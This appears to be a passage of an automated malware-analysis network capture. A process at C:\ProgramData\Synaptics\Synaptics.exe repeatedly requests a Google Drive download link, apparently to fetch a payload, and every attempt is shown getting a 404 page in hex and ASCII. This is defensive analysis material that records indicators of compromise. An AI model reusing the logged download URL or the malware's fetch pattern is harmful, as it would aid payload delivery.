                                                                                                                                                                                        2022-05-17 11:31:30 UTC28INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC28INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        80192.168.2.349833142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC241OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC244INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hx/ox6gE1KqCmyT7IVY0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC246INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 74 35 32 72 51 4b 69 32 63 63 6e 6c 75 34 2b 30 73 56 34 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ot52rQKi2ccnlu4+0sV4hQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:39 UTC247INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:39 UTC247INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        81192.168.2.349834142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC244OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC247INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VNLhe5+VGhItSpxv0O5UXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC248INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC248INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 76 76 51 31 42 58 65 42 77 6e 53 46 78 64 43 33 78 71 64 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jvvQ1BXeBwnSFxdC3xqdMg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC250INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC250INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        82192.168.2.349835142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC250OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC250INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-UMLgWSycTou3KXiLE+Y9OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC252INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC252INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4d 62 41 52 45 4d 59 53 6e 30 52 30 4c 35 6d 53 6d 36 59 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gMbAREMYSn0R0L5mSm6YpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC253INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:40 UTC253INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        83192.168.2.349836142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC250OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC253INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ig2eIGJG8u7966Pvq9bhJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC255INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:40 UTC255INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 67 4a 37 6d 45 59 67 63 58 77 61 74 32 4e 2f 53 2b 6d 70 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mgJ7mEYgcXwat2N/S+mp5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:40 UTC256INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:40 UTC256INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        84192.168.2.349837142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC253OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC256INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-r7/EXK6grFuMUG+yIo6RJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC258INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 58 31 73 65 6a 30 47 4c 61 51 67 30 33 39 38 4a 4c 53 4f 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iX1sej0GLaQg0398JLSOmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:40 UTC259INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
